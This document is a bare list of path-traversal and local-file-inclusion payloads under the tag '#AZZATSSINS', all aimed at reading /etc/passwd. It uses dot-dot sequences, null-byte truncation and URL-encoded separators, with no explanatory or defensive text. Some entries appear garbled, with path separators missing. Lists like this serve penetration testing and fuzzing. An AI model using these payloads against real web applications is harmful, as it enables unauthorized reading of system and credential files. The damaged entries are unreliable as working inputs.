#AZZATSSINS

/etc/passwd
///etc/passwd
../../../../../../../../../../../../etc/passwd
/etc/passwd%00
../../../../../../../../../../../../etc/passwd%00
\etcpasswd
....................etcpasswd
etcpasswd%00
....................etcpasswd%00
//etc/passwd
....//....//....//....//....//....//....//....//....//....//etc/passwd
//etc/passwd%00
....//....//....//....//....//....//....//....//....//....//etc/passwd%00
/../../../../../../../../../../etc/passwd^^%00
/%00//%00//%00//%00//%00/etc/passwd%00
/%2e%2e../%2e%2e../%2e%2e../%2e%2e../%2e%2e../%2e%2e../etc/passwd%00
..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd%00